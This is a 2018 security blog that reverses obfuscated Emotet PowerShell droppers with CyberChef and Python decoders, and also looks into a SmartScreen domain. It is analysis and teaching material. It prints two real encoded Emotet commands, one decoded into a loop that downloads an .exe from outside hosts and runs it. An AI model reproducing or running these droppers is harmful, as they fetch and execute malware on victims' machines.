Tuesday, July 10, 2018

July Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could simply run them through a sandbox, but I like to really understand the obfuscation for myself, which is why I take the time to reverse it a little and share how I go about it.

I will say that since I started using Cyber Chef, it almost feels like cheating in a way. I had a python script that I kept updating to look for signs of known Emotet encodings I've observed and then decode them; I was up to version 8 of that script. I still write this stuff to keep in practice, but I find Cyber Chef to be a much faster way of "writing" a decoder of sorts.

So, the new variant I had observed looks like this:

powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUayt6RxAL1g7PoSbHXGRW8JopjKWOyDabowAcR0koutZz8UbDHHDwJExq5u6LNDizVYEV0UlddC/+CdQPNrrUGnFhH2YVUxYRtK7uYm+Cpz5aP5rYsrwIPq3CAxprN4ZJiwNS41S6spJ4uZm/zqeSijM7SgE/4UDHTzrMi4/d3XDGqtgVDvx8TNnHEv/joTI+4wB/k6jsk7N0G7MX6rJ/z0cMjpcOR9c8R09B5F6B6sg4vOzfZ2XCoSoJE+UcKpm9+wZTunTbqZIBMfTydfgE=' ), [IO.comprEsSION.CompREssIONmoDE]::dECoMprEsS ) | fOREACH-OBject{ nEW-obJeCt SySteM.io.StREamreAder($_, [SyStem.tEXt.EncodiNg]::ASCIi ) } | FOReaCH-ObjEcT{ $_.rEADToENd( ) }) |. ( $eNv:CoMspeC[4,24,25]-join'')

The first thing to notice is that there is simple base64 encoding going on here. However, decoding it as-is (using base64 -d from the command line) looks like this:

��� �J.���Q�� <0 ne="" s.3="" trw=""> �<�5 �ޑ� ����I�� �&�c)c� ��u ͮ� �XGمTńm+�����ϖ���,� �p�ƚ���b�Ը�.���.fo��䢌�ҀO�P1�γ"��w\1��C� 6qĿ��L��� ��;$�� ��������#�Ñ�� ��y �z�/;7��p�J�D�G �o~����6�d�L}<�~

This isn't very helpful. However, when you look at the next clue, you can see that the decoded data is compressed and is being decompressed (a DeflateStream opened with CompressionMode Decompress).

This isn't new to me; I've observed similar tactics being used with tools like PowerSploit, and a quick python script I wrote a while back for those tactics actually works here. Forgive the long-winded approach, I never streamlined this:

echo "base64code" | base64 -d >> evilb64
python powershelldeflate2.py -i evilb64

$iZG=new-object Net.WebClient;$LJt='http://primerplano[.]org/Yb/@http://ave-ant[.]com/u/@http://muaithai[.]pl/bdwsab/@http://jmamusical[.]jp/wordpress/wp-content/Ec0SS/@http://nagoyamicky[.]com/cacheqblog/bDWJMUD/'.Split('@');$csU = '74';$tdq=$env:temp+'\'+$csU+'.exe';foreach($Hin in $LJt){try{$iZG.DownloadFile($Hin, $tdq);Start-Process $tdq;break;}catch{}}

My python script is largely based on information found here.  It attempts to use ZLIB and GZIP for decompressing the file.

Now, the other way I approached this (other than using write-host in powershell) is to use Cyber Chef to see if I could write a recipe for this variant. Here is that recipe!

Regular_expression('User defined','\\(\\s\\\'[a-zA-Z0-9/+=]*\\\'',true,true,false,false,false,false,'List matches') Find_/_Replace({'option':'Regex','string':'[\\(\\\'\\)]'},'',true,false,true) From_Base64('A-Za-z0-9+/=',true) Raw_Inflate(0,0,'Adaptive',false,false) Split('@','\\n') Regular_expression('User defined','https?[:a-zA-Z0-9/.-]*',true,true,true,true,false,false,'List matches')
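The same base64 -> raw inflate -> split-on-'@' chain as a small Python decoder, added here as an example (it is not the powershelldeflate2.py script from the post, nor the CyberChef recipe). The packed blob it decodes is constructed in the script itself from a benign stand-in with the same shape as the decoded Emotet stage (a quoted URL list followed by .Split('@')), so nothing malicious is embedded; the sample hostnames are example.com/org/net. Like the post's script, the inflater falls back to zlib/gzip header detection when raw DEFLATE fails.

```python
import base64
import re
import zlib

# Constructed stand-in for the decoded stage: a benign script with the same
# shape as the one in the post (quoted URL list split on '@'). Not the real blob.
SAMPLE_SCRIPT = (
    "$c=new-object Net.WebClient;"
    "$u='http://example.com/a/@http://example.org/b/@http://example.net/c/'"
    ".Split('@');Write-Host $u"
)


def pack_like_emotet(script: str) -> str:
    """Raw DEFLATE (no zlib header) then Base64: the inverse of what the
    DeflateStream / FromBase64String chain in the command undoes."""
    comp = zlib.compressobj(level=9, wbits=-15)  # negative wbits = raw deflate
    packed = comp.compress(script.encode("ascii")) + comp.flush()
    return base64.b64encode(packed).decode("ascii")


# Constructed command with the same structure as the observed one.
SAMPLE_COMMAND = (
    "powershell ( New-Object IO.Compression.DeflateStream([IO.MemoryStream]"
    "[Convert]::FromBase64String( '" + pack_like_emotet(SAMPLE_SCRIPT) + "' ), "
    "[IO.Compression.CompressionMode]::Decompress ) | ForEach-Object { ... } )"
)


def extract_b64(command: str) -> str:
    """Pull the quoted Base64 literal out of FromBase64String( '...' )."""
    m = re.search(r"frombase64string\s*\(\s*'([A-Za-z0-9+/=]+)'", command, re.I)
    if not m:
        raise ValueError("no FromBase64String literal found")
    return m.group(1)


def inflate_any(data: bytes) -> bytes:
    """Raw DEFLATE first (what DeflateStream writes); if that fails, retry with
    zlib/gzip header auto-detection (wbits=47), as the post's script does."""
    try:
        return zlib.decompress(data, wbits=-15)
    except zlib.error:
        return zlib.decompress(data, wbits=47)


def decode_command(command: str) -> str:
    """Base64 -> inflate -> text. latin-1 so no byte value can fail to decode."""
    return inflate_any(base64.b64decode(extract_b64(command))).decode("latin-1")


def stage2_urls(script: str) -> list:
    """Find the '...'.Split('@') literal and split it, as the recipe does."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", script, re.I)
    if not m:
        return []
    return [u for u in m.group(1).split("@") if re.match(r"https?://", u, re.I)]


def defang(url: str) -> str:
    """Bracket the dots in the host so the URL is safe to paste into a report."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme + "://" + host.replace(".", "[.]") + slash + path


if __name__ == "__main__":
    decoded = decode_command(SAMPLE_COMMAND)
    print(decoded)
    for u in stage2_urls(decoded):
        print(defang(u))
```

To run it against a real command, pass the whole powershell one-liner to decode_command(); the regexes are case-insensitive because the observed sample randomises the case of every cmdlet and type name.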

As you can see, the Cyber Chef output is pretty clean. As always, if anyone has any better RegEx to use here, I always enjoy optimizing these things. I hope everyone finds this useful.

Friday, June 22, 2018

New Emotet encoding observed and decoded

Nothing earth shattering to report here, I just wanted to share the latest Emotet encoded powershell command and one simple way to decode it to extract the Stage 2 download links.

I know, a lot of these obfuscated powershell commands can be easily decoded by simply using the write-host command; however, I do like to try different ways to reverse the obfuscation, as I think it makes for a good analyst exercise.

The powershell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68>70J4!102!106O25I77t121O30>106O4J107V67J95O95-91!17I4>4t92t92-92J5!71-66>74H74-88!88>68I72x66I74I95H78t5x72I68t70!4I98-94!24V90I67H77!104H4>107H67x95I95>91!17I4I4I95H78>88!95>5!79O66O89O64!95x94I66H91x5t69-71>4-126O18V83O104I120x4H107J67J95V95V91V17!4>4!92I92I92>5J65I83V88V95>94-79t66I68V5x89>94J4t66I92J79V114>105>4>12!5!120H91H71t66I95J3O12H107t12x2t16-15I66H91J74J92O89I11t22O11>15I77t81V95I124>96J92>5!69V78t83H95J3!26!7t11V26>27H24I19V30V25-2V16-15x102V105>77t113-108!11>22t11!15I78t69-93I17H95!78O70H91I11I0t11J12I119x12>11-0I11H15t66I91!74H92>89J11J0V11>12O5!78J83-78t12!16I77t68-89-78x74V72t67-3J15x65V120H69x123I72t11J66!69x11V15-97O88t94I74J66J2x80H95t89H82J80J15>92!64O89!122x114!5I111x68t92V69-71I68!74O79-109I66I71!78V3O15x65J120t69>123!72t5x127O68H120t95J89!66>69H76V3I2x7t11!15t102J105H77O113H108!2-16I120I95I74-89x95>6>123!89H68-72I78t88t88t11H15V102J105V77>113H108-16I73t89I78J74O64x16J86I72H74!95J72V67J80t92!89I66V95I78!6I67I68O88-95-11H15-116>5H110V83I72-78>91O95>66>68I69-5J102H78t88J88!74!76x78-16J86>86' -SplIT '>' -spLiT'X' -SpLiT '!'-sPlIt 'V' -SplIt'o' -SPLiT'i'-sPliT 'H'-SpLIT'-'-sPlit't'-sPLIt'J' |forEaCh{ [CHaR] ( $_-bXOr'0x2b' ) })+" $(SEt 'OfS' ' ') " )

There are a couple of quick things to note here which make reversing this pretty simple to understand. First, notice the -Split operators: these set the delimiters between the encoded values. Then notice -bXOr '0x2b': this tells us that each value is XORed with the key 0x2b.

There are a lot of ways to handle this, such as using the Linux tr command and other commands to strip out the punctuation and alpha characters, convert the decimal values and then apply the XOR key. However, I think it's worth pointing out the CyberChef tool to do this instead.

Here is a custom recipe I used in CyberChef to decode this:

Find_/_Replace({'option':'Regex','string':'[^\\w\\s]|[a-zA-Z]'},' ',true,false,true) From_Decimal('Space') XOR({'option':'Hex','string':'2b'},'Standard',true) Regular_expression('User defined','(https?\\x3a\\x2f\\x2f[wW]*\\.?[a-zA-Z0-9]+\\x2d?[a-zA-Z0-9]*\\x2e[a-zA-Z]+\\x2e?\\w*\\x2e?\\w*\\x2e?\\x2f[a-zA-Z0-9]+\\x2f)',true,true,false,true,false,false,'Highlight matches')
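The split / decimal / XOR decoding as a Python script, added as an example (not the author's own tooling or the CyberChef recipe). It takes the same shortcut the recipe does: every run of digits is one encoded character and everything else is a delimiter, which sidesteps the case-insensitive -split chain entirely. The sample blob it decodes is constructed inside the script from a benign stand-in; the only values taken from the observed command are the ten delimiter characters and the key 0x2b, and the key is read back out of the -bxor operand rather than hard-coded.

```python
import random
import re

# The ten delimiter characters from the observed command's -Split chain.
# PowerShell's -split is case-insensitive, which is why 'x', 'O' and 'I' also
# appear between the numbers in the blob.
DELIMITERS = ">X!VoiH-tJ"

# Constructed benign stand-in for the decoded stage; not the real payload.
SAMPLE_SCRIPT = (
    "$w=New-Object Net.WebClient;$u='http://example.com/x/'.Split('@');"
    "Write-Host $u"
)


def encode_like_emotet(script: str, key: int, seed: int = 1) -> str:
    """Constructed encoder: XOR each character with key, write it in decimal,
    and join the values with delimiters drawn from DELIMITERS in either case."""
    rng = random.Random(seed)
    values = [str(ord(c) ^ key) for c in script]
    out = [values[0]]
    for v in values[1:]:
        d = rng.choice(DELIMITERS)
        out.append(rng.choice([d.lower(), d.upper()]))
        out.append(v)
    return "".join(out)


# Constructed command with the same structure as the observed one.
SAMPLE_COMMAND = (
    "POwerSHell ieX( '" + encode_like_emotet(SAMPLE_SCRIPT, 0x2B) + "' "
    "-SplIT '>' -spLiT'X' -SpLiT '!' |forEaCh{ [CHaR] ( $_-bXOr'0x2b' ) })"
)


def extract_key(command: str) -> int:
    """Read the XOR key from the -bxor operand, e.g. -bXOr'0x2b' -> 43."""
    m = re.search(r"-bxor\s*'?(0x[0-9a-f]+|\d+)'?", command, re.I)
    if not m:
        raise ValueError("no -bxor operand found")
    return int(m.group(1), 0)  # base 0 accepts both '0x2b' and '43'


def decode_split_xor(blob: str, key: int) -> str:
    """Every run of digits is one encoded character; everything else is a
    delimiter. Same effect as the recipe's Find/Replace + From Decimal + XOR."""
    return "".join(chr(int(v) ^ key) for v in re.findall(r"\d+", blob))


def decode_command(command: str) -> str:
    """Locate the quoted blob, recover the key, and decode."""
    blob = re.search(r"'([0-9A-Za-z>!\-]+)'", command).group(1)
    return decode_split_xor(blob, extract_key(command))


if __name__ == "__main__":
    print(decode_command(SAMPLE_COMMAND))
```

Because the decoder ignores the delimiter set altogether, it also handles a future variant that swaps in different -Split characters, as long as the values stay decimal; a hex-encoded variant would need int(v, 16) instead.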

When applied, I get my stage2 download links:

If anyone has any improvements on the last bit of RegEx in the recipe let me know, it doesn't always catch all the links.

Wednesday, May 9, 2018

What is canonicalizer.ucsuri.tcs?

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit, unsuccessfully as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header:

For example:

Translates to https://ping..checkappexec.microsoft.com/windows/shell/actions

Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain. So I did some digging, and the results ranged wildly:

A Patent for reputation based software

A suggestion that this is part of a Canon printer

A couple Hybrid-analysis sandbox submissions for phishing pages where this domain was observed in DNS

And an AlienVault link which shows that this link didn't resolve even back a few years ago

Pivoting from the AlienVault link, I went to the associated VirusTotal page:

The relevant information here is:
Latest files that are not detected by any antivirus solution and embed URL pattern strings with the domain provided.

Which links here:

The piece that stands out here is the file name: ieapfltr.dll, which is part of SmartScreen.
So, I figured I would pull a few known clean hosts together, a Windows 7 and a couple of Windows 10 hosts, and sure enough they have this dll. In each case I ran the following:

strings -el ieapfltr.dll | grep "http"
strings -el ieapfltr.dll | grep "\.tcs"

Results: canonicalizer.ucsuri.tcs http://canonicalizer.ucsuri.tcs
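The -el flag matters here: Windows DLLs store most of their strings as UTF-16LE, so a plain strings run would miss them. The following Python script, added as an example and not part of the post, does what that pipeline does (scan for runs of printable characters each followed by a NUL byte, then filter on a substring) so the check can run anywhere without binutils. The buffer it scans is constructed: junk bytes around the two strings the post found, plus an 8-bit string that a 16-bit scan must not report. Given a path on the command line it scans that file instead.

```python
import re
import sys


def utf16le_strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of `strings -el`: runs of printable ASCII stored as UTF-16LE
    (each character followed by a NUL byte), at least min_len characters long."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def grep(lines: list, needle: str) -> list:
    """The `| grep "..."` half of the pipeline (plain substring match)."""
    return [s for s in lines if needle in s]


# Constructed buffer standing in for ieapfltr.dll: junk bytes around two
# UTF-16LE strings taken from the post's output, plus one 8-bit string.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03junk"
    + "http://canonicalizer.ucsuri.tcs".encode("utf-16-le")
    + b"\xff\xfe"
    + "canonicalizer.ucsuri.tcs".encode("utf-16-le")
    + b"\x00not16bit\x00"
)


def tcs_strings(data: bytes) -> list:
    """Wide strings containing '.tcs', i.e. the post's second command."""
    return grep(utf16le_strings(data), ".tcs")


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for s in tcs_strings(blob):
        print(s)
```

Run it as python find_tcs.py C:\Windows\System32\ieapfltr.dll (path assumed; check where the dll lives on your build) to reproduce the check on a host of your own.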

My conclusion is that this is part of SmartScreen, but why have only a couple of hosts been observed with a POST to this domain? Why are so many hosts attempting to resolve this domain? What is the purpose of this non-valid TLD anyway? I'm left with a lot of questions, but I do not believe at this time that there is anything malicious about this domain. I'm hoping someone has some more information about this; if you do, please contact me.